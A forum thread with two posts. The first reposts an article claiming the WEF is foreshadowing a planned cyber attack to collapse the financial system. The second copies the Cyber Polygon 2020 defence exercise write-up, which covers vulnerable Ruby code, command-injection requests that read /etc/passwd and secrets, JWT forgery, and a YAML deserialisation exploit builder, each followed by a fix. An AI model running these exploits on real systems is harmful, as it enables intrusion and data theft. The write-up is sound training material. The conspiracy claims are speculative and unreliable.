
Thread: WEF planning cyber attack on financial system?

  1. Link to Post #1
    Canada Avalon Member TomKat's Avatar

    WEF planning cyber attack on financial system?

    Like covid, they are announcing it ahead of time:

    https://www.activistpost.com/2021/04...al-system.html

    Better have some physical cash on hand.

    Admin editorial: this is a Whitney Webb article; she's amongst the very best independent researchers and journalists we have and her work here deserves to be placed right up-front. This isn't new news of course - it's been covered on the forum elsewhere, and discussed - Tintin.

    WEF Warns of Cyber Attack Leading to Systemic Collapse of the Global Financial System

    APRIL 7, 2021
    By Whitney Webb



    A report published last year by the WEF-Carnegie Cyber Policy Initiative calls for the merging of Wall Street banks, their regulators and intelligence agencies as necessary to confront an allegedly imminent cyber attack that will collapse the existing financial system.

    In November 2020, the World Economic Forum (WEF) and Carnegie Endowment for International Peace co-produced a report that warned that the global financial system was increasingly vulnerable to cyber attacks. Advisors to the group that produced the report included representatives from the Federal Reserve, the Bank of England, the International Monetary Fund, Wall Street giants like JP Morgan Chase and Silicon Valley behemoths like Amazon.

    The ominous report was published just months after the World Economic Forum had conducted a simulation of that very event – a cyber attack that brings the global financial system to its knees – in partnership with Russia’s largest bank, which is due to jumpstart that country’s economic “digital transformation” with the launch of its own central bank-backed digital currency.

    More recently, last Tuesday, the largest information sharing organization of the financial industry, whose known members include Bank of America, Wells Fargo and CitiGroup, has again warned that nation-state hackers and cybercriminals were poised to work together to attack the global financial system in the short term. The CEO of this organization, known as the Financial Services Information Sharing and Analysis Center (FS-ISAC), had previously advised the WEF-Carnegie report that had warned much the same.

    Such coordinated simulations and warnings from those who dominate the current, ailing financial system are obvious cause for concern, particularly given that the World Economic Forum is well known for its Event 201 simulation about a global coronavirus pandemic that took place just months prior to the COVID-19 crisis.

    The COVID-19 crisis has since been cited as the main justification for accelerating the “digital transformation” of the financial and other sectors that the Forum and its partners have promoted for years. Their latest prediction of a doomsday event, a cyber attack that stops the current financial system in its tracks and instigates its systemic collapse, would offer the final yet necessary step for the Forum’s desired outcome of this widespread shift to digital currency and increased global governance of the international economy.

    Given that experts have been warning since the last global financial crisis that the collapse of the entire system was inevitable due to central bank mismanagement and rampant Wall Street corruption, a cyber attack would also provide the perfect scenario for dismantling the current, failing system as it would absolve central banks and corrupt financial institutions of any responsibility. It would also provide a justification for incredibly troubling policies promoted by the WEF-Carnegie report, such as a greater fusion of intelligence agencies and banks in order to better “protect” critical financial infrastructure.

    Considering the precedent of the WEF’s past simulations and reports with the COVID-19 crisis, it is well worth examining the simulations, warnings and the policies promoted by these powerful organizations. The remainder of this article will examine the WEF-Carnegie report from November 2020, while a follow-up report will focus on the more recent FS-ISAC report published last week. The WEF simulation of a cyber attack on the global financial system, Cyber Polygon 2020, was covered in detail by Unlimited Hangout in a previous report.

    The WEF-Carnegie Cyber Policy Initiative

    The Carnegie Endowment for International Peace is one of the most influential foreign policy think tanks in the United States, with close and persistent ties to the US State Department, former Presidents, corporate America and American oligarch clans like the Pritzkers of Hyatt hotels. Current trustees of the endowment include executives from Bank of America and CitiGroup as well as other influential financial institutions.

    In 2019, the same year as Event 201, the Endowment launched its Cyber Policy Initiative with the goal of producing an “International Strategy for Cybersecurity and the Global Financial System 2021-2024.” That strategy was released just months ago, in November 2020 and, according to the Endowment, was authored by “leading experts in governments, central banks, industry and the technical community” in order to provide a “longer-term international cybersecurity strategy” specifically for the financial system.

    The initiative is an outgrowth of past efforts of the Carnegie Endowment to promote the fusion of financial authorities, the financial industry, law enforcement and national security agencies, which is both a major recommendation of the November 2020 report and a conclusion of a 2019 “high-level roundtable” between the Endowment, the IMF and central bank governors. The Endowment had also partnered with the IMF, SWIFT, Standard Chartered and FS-ISAC to create a “cyber resilience capacity-building tool box” for financial institutions in 2019. That same year, the Endowment also began tracking “the evolution of the cyber threat landscape and incidents involving financial institutions” in collaboration with BAE Systems, the UK’s largest weapons manufacturer. Per the Endowment, this collaboration continues into the present.

    In January 2020, representatives of the Carnegie Endowment presented their Cyber Policy Initiative at the annual meeting of the World Economic Forum, after which the Forum officially partnered with the Endowment on the initiative.

    Advisors to the now joint WEF-Carnegie project include representatives of central banks like the US Federal Reserve and the European Central Bank; some of Wall Street’s most infamous banks like Bank of America and JP Morgan Chase; law enforcement organizations such as INTERPOL and the US Secret Service; corporate giants like Amazon and Accenture; and global financial institutions like the International Monetary Fund (IMF) and SWIFT. Other notable advisors include the managing director and head of the WEF’s Centre for Cybersecurity, Jeremy Jurgens, who was also a key player in the Cyber Polygon simulation, and Steve Silberstein, the CEO of the Financial Services Information Sharing and Analysis Center (FS-ISAC).

    “Not a Question of If but When“

    The Cyber Policy Initiative’s November 2020 report is officially titled “International Strategy to Better Protect the Financial System.” It begins by noting that the global financial system, like many other systems, is “going through unprecedented digital transformation, which is being accelerated by the coronavirus pandemic.”

    It then warns that:

    “Malicious actors are taking advantage of this digital transformation and pose a growing threat to the global financial system, financial stability, and confidence in the integrity of the financial system. Malign actors are using cyber capabilities to steal from, disrupt, or otherwise threaten financial institutions, investors and the public. These actors include not only increasingly daring criminals, but also states and state-sponsored attackers.”

    Following this warning of “malign actors”, the report notes that “increasingly concerned, key voices are sounding the alarm.” It notes that Christine Lagarde of the European Central Bank and formerly of the IMF warned in February 2020 that “a cyber attack could trigger a serious financial crisis.” A year prior, at the WEF’s annual meeting, the head of Japan’s central bank predicted that “cybersecurity could become the financial system’s most serious risk in the near future.” It also notes that in 2019, Jamie Dimon of JP Morgan Chase similarly labeled cyber attacks as possibly “the biggest threat to the US financial system.”

    Not long after Lagarde’s warning, in April 2020, the Financial Stability Board asserted that “cyber incidents pose a threat to the stability of the global financial system” and that “a major cyber incident, if not properly contained, could seriously disrupt financial systems, including critical financial infrastructure, leading to broader financial stability implications.”

    The WEF-Carnegie report authors add to these concerns that “the exploitation of cyber vulnerabilities could cause losses to investors and the general public” and lead to significant damage to public trust and confidence in the current financial system. It also notes, aside from affecting the general public in a significant way, this threat would impact both high-income countries and low to lower-middle income countries, meaning its impact on the masses will be global in scope.

    The report then ominously concludes that “one thing is clear: it is not a question of if a major incident will happen, but when.“

    Ensuring control of the narrative

    Another section of the report details recommendations for controlling the narrative in the event such a crippling cyber attack takes place. The report specifically recommends that “financial authorities and industry should ensure they are properly prepared for influence operations and hybrid attacks that combine influence operations with malicious hacking activity” and that they “apply lessons learned from influence operations targeting electoral processes to potential attacks on financial institutions.”

    It goes on to recommend that “major financial services firms, central banks and other financial supervisory authorities”, representatives of which advised the WEF-Carnegie report, “identify a single point of contact within each organisation to engage social media platforms for crisis management.”

    The report’s authors argue that, “in the event of a crisis,” such as a devastating cyber attack on the global banking system, “social media companies should swiftly amplify communications by central banks” so that central banks may “debunk fake information” and “calm the markets.” It also states that “financial authorities, financial services firms and tech companies [presumably including social media companies] should develop a clear communications and response plan focused on being able to react swiftly.” Notably, both Facebook and Twitter are listed in the report’s appendix as “industry stakeholders” that have “engaged” with the WEF-Carnegie initiative.

    The report also asserts that premeditated coordination for such a crisis between banks and social media companies needs to take place so that both parties may “determine what severity of crisis would necessitate amplified communication.” The report also calls for social media companies to work with central banks to “develop escalation paths similar to those developed in the wake of the past election interference, as seen in the United States and Europe.”

    Of course, those “escalation paths” involved wide-ranging social media censorship. The report seems to acknowledge this, when it adds that “quick coordination with social media platforms is necessary to organise content takedowns.” Thus, the report is calling for central banks to collude with social media platforms to plan out censorship efforts that would be enacted if a sufficiently severe crisis occurs in financial markets.

    As far as “influence operations” go, the report divides these into two categories; those that target individual firms and those that target markets overall. Regarding the first category, the report states that “organised actors will spread fraudulent rumours to manipulate stock prices and generate profit based on how much the price of the stock was artificially moved.” It then adds that, in these influence operations, “firms and lobbyists use astroturfing campaigns, which create a false appearance of grassroots support, to tarnish the value of a competing brand or attempt to sway policymaking decisions by abusing calls for online public comments.” The similarities between this latter statement and the Wall Street Bets phenomenon of January 2021 are obvious.

    Regarding the second category of “influence operations,” the report defines these operations as “likely to be carried out by a politically motivated actor like a terrorist group or even a nation-state.” It adds that “this type of influence operation may directly target the financial system to manipulate markets, for example, by spreading rumours about market-moving decisions by central banks” as well as spreading “false information that does not directly reference financial markets but that causes financial markets to react.”

    Given that the report states that the first category of influence operation poses little systemic risk while the second “may pose systemic risk”, it seems more likely that the event being predicted by the WEF-Carnegie report would involve claims of the latter by a “terrorist group” or potentially a nation-state. Notably, the report mentions North Korea as a likely nation-state offender on several occasions. It also dwells on the likelihood that synthetic media or “deep fakes” would be part of this system-devastating event in emerging economies and/or in high-income countries experiencing a financial crisis.

    A separate June 2020 report from the WEF-Carnegie initiative was published specifically on deepfakes and the financial system, noting that such attacks would likely transpire during a larger financial crisis to “amplify” damaging narratives or “simulate grassroots consumer backlash against a targeted brand.” It adds that “companies, financial institutions and government regulators facing public relations crises are especially vulnerable to deepfakes and synthetic media.”

    In light of these statements, it is worth pointing out that bad actors within the current system could exploit these scenarios and theories to paint actual grassroots backlash against a bank or corporation as being a synthetic “influence operation” perpetrated by “cybercriminals” or a nation-state. Considering that the WEF-Carnegie report references a scenario analogous to the Wall Street Bets situation in January 2021, a banker-led effort to falsely label a future grassroots backlash as instead being synthetic and the fault of a “terrorist group” or nation-state should not be ruled out.

    “Reducing Fragmentation”: Merging Banks with their Regulators and Intelligence Agencies

    Given the inevitability of this destructive event predicted by the report’s authors, it is important to focus in on the solutions proposed in the WEF-Carnegie report as they will become immediately relevant if this event, as predicted by the WEF and Carnegie Endowment, does come to pass.

    Some of the solutions proposed are to be expected from a WEF-linked policy document, such as the calls for increased public-private partnerships and greater coordination among regional and international organizations as well as increased coordination between national governments.

    However, the main “solution” at the heart of this report, and also at the heart of the WEF-Carnegie initiative’s other endeavors, is a call to fuse corporate banks, the financial authorities that essentially oversee them, tech companies and the national security state.

    The report’s authors first argue that the main vulnerability of the global financial system at present is “the current fragmentation among stakeholders and initiatives” and that mitigating this threat to the global system lies in reducing that “fragmentation.” The report argues that the way to resolve the issue requires massive re-organization of all “stakeholders” via increased global coordination. The report notes that the “disconnect between the finance, the national security and the diplomatic communities is particularly pronounced” and calls for much closer interaction between the three.

    It then states that:

    “This requires countries not only to better organize themselves domestically but also to strengthen international cooperation to defend against, investigate, prosecute and ideally prevent future attacks. This implies that the financial sector and financial authorities must regularly interact with law enforcement and other national security agencies in unprecedented ways, both domestically and internationally.”


    Some examples of these “unprecedented interactions” between banks and the national security state are included in the report’s recommendations. For instance, it argues that “governments should use the unique capabilities of their national security communities to help protect FMIs [financial market infrastructures] and critical trading systems.” It also calls for “national security agencies [to] consult critical cloud service providers [like WEF-Carnegie initiative partner Amazon Web Services] to determine how intelligence collection could be used to help identify and monitor potential significant threat actors and develop a mechanism to share information about imminent threats” with tech companies.

    The report also states that “the financial industry should throw its weight behind efforts to tackle cyber crime more effectively, for example by increasing its participation in law enforcement efforts.”

    On that last point, there are indications this has already begun. For instance, Bank of America, the second largest bank in the US and part of the WEF-Carnegie Initiative and FS-ISAC, was reported to have “actively but secretly engaged” with US law enforcement agencies in the hunt for “political extremists” following the January 6th events at Capitol Hill. In doing so, Bank of America shared private information with the federal government without the knowledge or consent of its customers, leading critics to accuse the bank of “effectively acting as an intelligence agency.”

    Yet, arguably the most troubling part of the report is its call to unite the national security apparatus and the finance industry first, and then use that as a model to do the same with other sectors of the economy. It states that “protecting the international financial system can be a model for other sectors,” adding that “focusing on the financial sector provides a starting point and could pave the way to better protect other sectors in the future.”

    Were all the sectors of the economy to also fuse with the national security state, it would inevitably create a reality where there is no part of daily human life that is not ultimately controlled by these two already very powerful entities. This is a clear recipe for techno-fascism on a global scale. As this WEF-Carnegie report makes clear, the roadmap regarding how to cook up such a nightmare has already been charted out in coordination with the very institutions, banks and governments that currently control the global financial system.

    Not only that, but – as pointed out in Unlimited Hangout’s article on Cyber Polygon – the World Economic Forum and many of its partners have a vested interest in the systemic collapse of the current financial system. In addition, many central banks have recently backed new digital currency systems that can only achieve rapid, mass adoption if the existing system collapses.

    Given that these systems are set to be integrated with biometric IDs and so-called “vaccine passports” through the WEF and Big Tech-backed Vaccine Credential initiative, it is worth considering the timing of the expected launch of such systems in determining when this predicted and allegedly inevitable event is likely to occur.

    With this new financial system so deeply inter-connected to these “credential” efforts, this cyber attack on the financial sector would likely take place at a time when it would best facilitate the adoption of the new economic system and its integration into credential systems currently being promoted as a “way out” of COVID-19-related restrictions.

    Source: The Last American Vagabond

    ---------------------

    Whitney Webb is a staff writer for The Last American Vagabond. She has previously written for Mintpress News, Ben Swann’s Truth In Media. Her work has appeared on Global Research, the Ron Paul Institute and 21st Century Wire, among others. She currently lives with her family in southern Chile.

    https://www.thelastamericanvagabond..../whitney-webb/

    _______________

    Carnegie report: International Strategy to Better Protect the Financial System Against Cyber Attacks - Maurer + Nelson (document runs to 242 pages and is too large to embed here)
    Last edited by Tintin; 8th April 2021 at 09:54.


  3. Link to Post #2
    UK Moderator/Librarian/Administrator Tintin's Avatar

    "Cyber Polygon" Simulation Exercise - July 2020

    We of course all know where these 'simulation' exercises lead.

    Forgive the inclusion here of the coding from their site, but those super-smart of you out there who understand code well may find something of interest there. It's a direct copy/paste from their site and I think may prove interesting.

    And we don't give the geekier ones of you anywhere near enough to possibly feed on. Do note that the appearance of emojis part way through some of the code is a result obviously of e.g. colon + p being used in the code.

    ---------------------------------------------------------

    Overview from website:
    Cyber Polygon 2020
    In 2020, the live stream gathered 5 million spectators from 57 nations. The event featured the world’s leaders and renowned experts, including Mikhail Mishustin, Prime Minister of the Russian Federation, Klaus Schwab, Founder and Executive Chairman, World Economic Forum, top officials from INTERPOL, ICANN, Visa, IBM, Sber, MTS and other organisations.

    The technical exercise attracted 120 of the largest enterprises from 29 countries. These included financial, healthcare and educational institutions, state and law enforcement agencies, energy suppliers, companies from IT, metal, telecom, chemical, aerospace engineering and other sectors.
    -----------------------

    Defence Scenario: Cyber Polygon 2020 Technical Exercise Write-up - https://2020.cyberpolygon.com/materi...-polygon-2020/

    On 8 July 2020, Cyber Polygon — an international online cybersecurity training — took place for the second time. The technical exercise was attended by 120 teams from some of the largest Russian and international organisations across 29 countries. Among the participants were: banks, telecom providers, energy suppliers, medical institutions, universities as well as government and law enforcement agencies.

    The participants acting as Blue Teams had to defend their segments of the training infrastructure. The organisers (BI.ZONE) acted as the Red Team and simulated the cyberattacks.

    The exercise included two scenarios: Defence and Response.

    This article goes into details of the Defence scenario, where the participants had to repel an attack conducted by the Red Team, and covers the following topics:

    - basic game mechanics
    - infrastructure and game service provided to the participants
    - vulnerabilities embedded in the services
    - exploitation scenarios and attack detection methods
    - vulnerability remediation methods

    Legend
    According to the legend, the organisation’s virtual infrastructure included a service which processed confidential client information. This service became the subject of interest to an APT group. Cybercriminals were going to steal confidential user data and then resell it on the Darknet in order to receive a financial benefit and cause damage to company reputation.

    The APT group studied the target system in advance and discovered several critical vulnerabilities. The gang launched the attack on the day of the exercise.

    The Blue Teams had to:

    - contain the attack as fast as possible
    - minimise the amount of information stolen
    - maintain the service availability

    The participants could apply any available and familiar methods and tools to protect the infrastructure.

    Core Mechanics
    The team members who had participated in Attack-Defence CTF may have noticed some similarities between this format of cybersecurity competition and the scenario being described. However, during the Cyber Polygon training, the participants were not expected to attack each other — all they had to do was protect their own services.

    This rule was introduced to ensure that all the participants were on an equal playing field and could focus on improving their defensive skills. Besides, it enabled a more objective assessment of the teams’ skills due to more accurate quantitative metrics.

    The following indicators were used as metrics:

    Health Points (HP). A simple numerical value. Every time the Red Team successfully exploited a vulnerability in the Blue Team’s services and captured the flag, the Blue Team lost HP. The more vulnerabilities the Red Team was able to exploit, the more HP the team lost. HP was deducted once per round.

    Service Level Agreement (SLA). In the context of this scenario, SLA indicated the integrity and accessibility of a service. It was measured as a percentage (0–100%). The defending team lost SLA points if the service was made unavailable or malfunctioned at the moment the checker contacted it. The checker could access any service several times per round, but each team’s services were checked an equal number of times. The resulting SLA was calculated as the percentage of successful checks (when the service was available and fully functional) to the total number of checks.

    The checker is the mechanism that allowed the organisers to check if the teams’ services were fully functional. Since the game service simulated a real web application, the checker was also used to ensure compliance with the rules of the game: the participants could not simply turn off the service or disable some of its features, all they could do was defend their segments against Red Team attacks.

    The final score for the scenarios was calculated as SLA * HP.

    The participants were given 30 minutes for preparation, i.e. they were supposed to familiarise themselves with the service provided, roll out monitoring and defensive tools and start searching for vulnerabilities in the service code.

    After the 30 minutes, the so-called ‘active phase’ of the scenario began: the Red Team started their attack. The active phase consisted of 18 rounds, 5 minutes each.

    Before the start of the scenario, each team received 180 HP for each of the 5 vulnerabilities embedded in the service (900 HP in total). The team lost 10 HP for each vulnerability exploited. Thus, if the team had 3 vulnerabilities exploited during a round, it lost a total of 30 HP in this round, and if 5 vulnerabilities were exploited — 50 HP respectively.

    Apart from controlling the availability of the teams’ services, the checker was used to deliver the so-called flag to the teams’ services at the beginning of each round (using legitimate service functions). Flag is a ‘Polygon{JWT}’ format string, where JWT stands for JSON Web Token.

    In this scenario, the flag represented confidential data: the more flags the Red Team was able to steal, the more data was leaked. A stolen flag also meant the exploitation of a vulnerability: the team lost HP once the Red Team took advantage of a vulnerability and grabbed the flag.


    Infrastructure and Game Service
    Each participating team was provided with a virtual server running the Linux operating system.

    After connecting via VPN, the participants got access to their server through SSH. The teams were granted full (root) access to their system.

    The participants’ game service was available from the user’s home directory /home/cyberpolygon/ch4ng3org.

    The game service backend was written in Ruby, while the frontend used the React JS framework. The database was managed by the PostgreSQL DBMS.

    The service was designed to be rolled out on Docker, which was evident from its directory: for instance, it contained such files as Dockerfile and docker-compose.yml.

    The participants had full access to the service’s source codes, configuration files and the database, and could use this information to search for and fix vulnerabilities in the service.


    Vulnerabilities
    Insecure Direct Object References

    The vulnerability referred to as insecure direct object reference (IDOR) is caused by flaws in authorisation mechanisms. The vulnerability allows an attacker to gain access to otherwise inaccessible user data.

    This vulnerability was present in the game service under the get method of the UsersController class.

    backend/app/controllers/users_controller.rb:

        def get
          user = User.find(params[:id])
          if params[:full].present?
            json_response({
              id: user.id,
              name: user.name,
              email: user.email,
              phone: user.phone
            })
          else
            json_response({
              id: user.id,
              name: user.name
            })
          end
        end

    When calling the address http://example.com/api/users/<USER_ID>, where USER_ID is a numeric user identifier, any user could get a JSON object containing a numeric identifier and a username corresponding to that numeric identifier.

    This functionality as such does not pose any threat to user data. You should rather focus on the following code snippet:

        if params[:full].present?
          json_response({
            id: user.id,
            name: user.name,
            email: user.email,
            phone: user.phone
          })

    Note that if the full parameter is transmitted in a request, the server response will return more data: in addition to the user ID and username, it will contain their email and phone number.

    The flags were stored in and could be stolen from the user.phone field in the game service’s directory (this activity could be detected, for example, by analysing the network traffic). Each round, the checker created several users and saved the flag as one of such users’ phone number.

    In order to take advantage of this weakness, the Red Team sent requests like http://example.com/api/users/<USER_ID>?full=1 to the service and searched for the flag in the phone field of the output JSON objects.

    To protect against this vulnerability, it would be good practice to obscure sensitive data when displaying it to the user. Thus, the phone number +71112223344 can be shown as +7111*****44.

    For example:
    def get
      user = User.find(params[:id])
      if params[:full].present?
        # Masking user's phone number (on a copy, so the model attribute is untouched)
        uphone = user.phone.dup
        x = 5
        y = uphone.length - 3
        # x..y is an inclusive range, so it covers y - x + 1 characters
        replacement = '*' * (y - x + 1)
        uphone[x..y] = replacement

        json_response({
          id: user.id,
          name: user.name,
          email: user.email,
          phone: uphone
        })
      else
        json_response({
          id: user.id,
          name: user.name
        })
      end
    end

    In this case, the Red Team would have got a line like Polyg********X} instead of the full flag value and the participating team could have avoided losing HP due to this vulnerability being exploited.


    Command Injection
    Command injection is the result of inadequate filtering of user data. This vulnerability enables an attacker to inject OS commands that are executed on the target system with the privileges of the vulnerable application.

    In the game service, the vulnerability was present in the disk_stats method of the StatsController class.

    backend/app/controllers/stats_controller.rb:

    def disk_stats
      if params[:flags].present?
        flags = params[:flags]
      else
        flags = ''
      end

      json_response({
        disk: `df #{flags}`
      })
    end

    When calling the address http://example.com/api/disk_stats, the service responds with the output of the system df utility in the disk field of the JSON object, which makes it possible to evaluate the amount of free space in the file system.

    The command being called was designed to transmit various parameters, but their value is not filtered out:

    if params[:flags].present?
      flags = params[:flags]
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    json_response({
      disk: `df #{flags}`
    })

    This means that a potential attacker can execute virtually any command in the system using special command-line syntax.

    For example, by running a request http://example.com/api/disk_stats?flags=;cat /etc/passwd a threat actor will be able to read the contents of system file /etc/passwd.

    This is how the Red Team exploited this weakness:

    By sending a request http://example.com/api/disk_stats?flags=>dev/null;cat config/secrets.yml, the attackers obtained the contents of the backend/config/secrets.yml file, which stored the private key for signing JWT tokens.

    Having obtained the private key, the Red Team could generate and sign a JWT token valid for any user. Given that the Red Team used the current private key of the service, this token would have been successfully validated and accepted by the application.

    By sending a request http://example.com/api/me on behalf of the user for whom the token was generated, the Red Team obtained the user’s phone number and checked it for a flag.

    To protect against this vulnerability, a sufficient measure was to prohibit any parameters from being injected in the command call, as the overall system performance is not tied to this endpoint being used:

    def disk_stats
      json_response({
        disk: `df`
      })
    end

    Security Misconfiguration
    The vulnerability known as security misconfiguration is usually caused by a human factor. Standard application configurations are often not specifically geared towards security. Due to the lack of proactivity, attention or competence of responsible staff, these configurations sometimes remain unadapted to harsh realities, which comes with significant security implications.

    The game service had this vulnerability embedded in the db service description, in the docker-compose.yml file.
    docker-compose.yml:


    db:
      image: postgres
      restart: always
      network_mode: bridge
      volumes:
        - ./db_data:/var/lib/postgresql/data
      ports:
        - 5432:5432
      environment:
        POSTGRES_DB: ch4ng3
        POSTGRES_USER: ch4ng3
        POSTGRES_PASSWORD: ch4ng3

    As you can see, the network port of the database is available from the external network:

      ports:
        - 5432:5432

    Besides, the database server uses one and the same line as a database name, username and password, which also matches the service ch4ng3.org.

    Having detected the database port as a result of network scanning, the Red Team was able to brute-force the login and password to the database. It then executed the SQL statement below, which returned all user phone numbers with flags inside:


    SELECT phone FROM users WHERE phone LIKE 'Polygon%'
    To protect against this vulnerability, the ideal solution would have been to prohibit the database from being connected externally and to change the database user password (with the api service reconfigured accordingly):

    db:
      image: postgres
      restart: always
      network_mode: bridge
      volumes:
        - ./db_data:/var/lib/postgresql/data
      environment:
        POSTGRES_DB: ch4ng3
        POSTGRES_USER: ch4ng3
        POSTGRES_PASSWORD: <VERY_SECRET_PASSWORD>

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      environment:
        - DATABASE_URL=postgres://ch4ng3:<VERY_SECRET_PASSWORD>@db:5432/ch4ng3?sslmode=disable

    However, one of the two actions would have sufficed: either changing the database user password to a stronger one or prohibiting database connections from the external network.


    JWT Signature Algorithm Change
    The next vulnerability buried in the game service related to JWT signature algorithm change.

    It was present in the decode method of the JsonWebToken class.

    backend/app/lib/json_web_token.rb:

    def self.decode(token, algorithm)
      # cannot store key as ruby object in yaml file
      public_key = Rails.application.secrets.public_key_base
      if algorithm == 'RS256'
        public_key = OpenSSL::PKey::RSA.new(public_key)
      end
      # get payload; first index in decoded array
      body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
      HashWithIndifferentAccess.new body
    # rescue from expiry exception
    rescue JWT::ExpiredSignature, JWT::VerificationError => e
      # raise custom error to be handled by custom handler
      raise ExceptionHandler::InvalidToken, e.message
    end

    The following lines deserve a closer look:

    public_key = Rails.application.secrets.public_key_base
    if algorithm == 'RS256'
      public_key = OpenSSL::PKey::RSA.new(public_key)
    end
    # get payload; first index in decoded array
    body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]

    The application loads the line with the service public key from the configuration file and, where an RS256 algorithm has been transmitted in the token, converts that line to an RSA public key, which is further used to verify the token signature.

    Note that if any other value is transmitted in the algorithm parameter, the public key line will not be converted. If the HS256 value is sent to the alg JWT field, the HMAC symmetric algorithm will be used for token signature verification, and exactly this public key line will be used as a key to verify the token signature.

    This is how this weakness was exploited by the Red Team:

    By sending a request http://example.com/api/auth/third_party, the attackers received the service public key from the public_key field of the output JSON object.
    Having obtained the public key, the Red Team could generate a valid JWT token for any user by sending the HS256 value to the alg JWT field and signing the token, with the service public key line used as a secret for the HMAC algorithm.
    By sending a request http://example.com/api/me on behalf of the user for whom the token was generated, the Red Team obtained the user’s phone number and checked it for a flag.

    To protect against this vulnerability, the following recommendation could have helped: when working with JWT, you had better use only one signature algorithm at a time — either symmetric or asymmetric. Thus, the easiest fix would be:

    backend/app/lib/json_web_token.rb:


    def self.decode(token, algorithm)
      # cannot store key as ruby object in yaml file
      public_key = Rails.application.secrets.public_key_base
      if algorithm == 'RS256'
        public_key = OpenSSL::PKey::RSA.new(public_key)
      else
        raise ExceptionHandler::InvalidToken, Message.invalid_token
      end
      # get payload; first index in decoded array
      body = JWT.decode(token, public_key, true, {:algorithm => algorithm})[0]
      HashWithIndifferentAccess.new body
    # rescue from expiry exception
    rescue JWT::ExpiredSignature, JWT::VerificationError => e
      # raise custom error to be handled by custom handler
      raise ExceptionHandler::InvalidToken, e.message
    end


    Now, if you send a value other than RS256 to the token’s alg field, the token will be marked as invalid and the Red Team will not be able to access the application on behalf of other users by signing tokens with the service public key.


    YAML Insecure Deserialisation
    The last vulnerability embedded in the game service was associated with YAML insecure deserialisation.

    The import method of the PetitionsController class was responsible for importing petitions through their YAML-format description.

    backend/app/controllers/petitions_controller.rb:

    def import
      yaml = Base64.decode64(params[:petition])
      begin
        petition = YAML.load(yaml)
      rescue Psych::SyntaxError => e
        json_response({message: e.message}, 500)
        return
      rescue => e
        json_response({message: e.message, trace: ([e.message]+e.backtrace).join($/)}, 500)
        return
      end
      if petition['created_at']
        petition = current_user.petitions.create!(text: petition['text'], title: petition['title'], created_at: petition['created_at'])
      else
        petition = current_user.petitions.create!(text: petition['text'], title: petition['title'])
      end
      petition.signs.create!(petition_id: petition.id, user_id: current_user.id)
      json_response(petition)
    end

    Particular attention should have been given to the following code lines:


    yaml = Base64.decode64(params[:petition])
    begin
      petition = YAML.load(yaml)
    rescue Psych::SyntaxError => e
      json_response({message: e.message}, 500)
      return

    As you may have noticed, the contents of a YAML object are taken from the base64-coded petition parameter and then converted into Ruby objects using the YAML.load(yaml) structure.

    This structure is insecure and allows, among other things, arbitrary Ruby code execution on the target system within the vulnerable application, which is what the Red Team did.

    The following script was used to generate a YAML object to take advantage of this weakness:


    require "erb"
    require "base64"
    require "active_support"

    if ARGV.empty?
    puts "Usage: exploit_builder.rb <source_file>"
    exit!
    end

    erb = ERB.allocate
    erb.instance_variable_set :@src, File.read(ARGV.first)
    erb.instance_variable_set :@lineno, 1

    depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result

    payload = Base64.encode64(Marshal.dump(depr))

    puts <<-PAYLOAD
    ---
    !ruby/object:Gem::Requirement
    requirements:
    - !ruby/object:Rack::Session::Abstract::SessionHash
    req: !ruby/object:Rack::Request
    env:
    rack.session: !ruby/object:Rack::Session::Abstract::SessionHash
    loaded: true
    HTTP_COOKIE: "a=#{payload}"
    store: !ruby/object:Rack::Session::Cookie
    coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
    key: a
    secrets: []
    exists: true

    PAYLOAD
    The following code was applied as the payload:

    phones = ''
    User.all().each do |user|
    phones += user.phone + ';'
    end
    raise phones
    The code received the phone numbers of all users registered with the service, combined them through ';' and applied the raise structure to cause an exception, sending the line with the users’ phone numbers as an error message.

    The error message was then returned by the server to the JSON object message field together with the response code 500. Once the Red Team received this response, all it had to do was locate the flag in the error message.

    To protect against this vulnerability, it was sufficient to replace the call of the YAML.load(yaml) function with the call of the YAML.safe_load(yaml) function. However, during the availability check, the checker verified that the transmitted YAML object allowed for aliases to be applied. Hence, the resulting structure is represented as follows: YAML.safe_load(yaml, aliases: true).

    And the resulting secure function accordingly:

    def import
      yaml = Base64.decode64(params[:petition])
      begin
        petition = YAML.safe_load(yaml, aliases: true)
      rescue Psych::SyntaxError => e
        json_response({message: e.message}, 500)
        return
      rescue => e
        json_response({message: e.message, trace: ([e.message]+e.backtrace).join($/)}, 500)
        return
      end
      if petition['created_at']
        petition = current_user.petitions.create!(text: petition['text'], title: petition['title'], created_at: petition['created_at'])
      else
        petition = current_user.petitions.create!(text: petition['text'], title: petition['title'])
      end
      petition.signs.create!(petition_id: petition.id, user_id: current_user.id)
      json_response(petition)
    end

    Conclusion
    In our article, we explored the vulnerabilities implanted in Cyber Polygon’s Defence scenario game service, analysed the applied exploitation scenarios and gave examples of remediation that would have allowed the participants to protect their services against the Red Team.

    We would use the patch methods from the examples in a real-life situation. However, you should keep in mind that these are not the only possible effective methods.

    The scenario assumed that the participants would be able to defend themselves without having to patch the code in their game services. For example, to protect against the third vulnerability — security misconfiguration, which is associated with an insecure Docker configuration, it was sufficient to block the database port on the firewall.

    However, we believe that the best solution is to remediate the flaws in services and applications rather than resorting to ’palliative’ measures, which sooner or later may not be sufficient to withstand an attack. This is why we examined in detail the source code corrections as a means to protect against vulnerabilities.

    We hope that you have found the exercise useful and insightful, and look forward to seeing you at the next Cyber Polygon events.
    “If a man does not keep pace with [fall into line with] his companions, perhaps it is because he hears a different drummer. Let him step to the music which he hears, however measured or far away.” - Thoreau

  4. The Following 16 Users Say Thank You to Tintin For This Post:

    Alecs (6th May 2021), Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Gwin Ru (10th July 2021), Harmony (8th April 2021), mountain_jim (8th April 2021), O Donna (10th April 2021), pabranno (8th June 2021), palehorse (8th April 2021), Reinhard (8th May 2021), Sérénité (6th May 2021), Snoweagle (8th April 2021), TomKat (8th April 2021), toppy (8th April 2021), Yoda (8th April 2021)
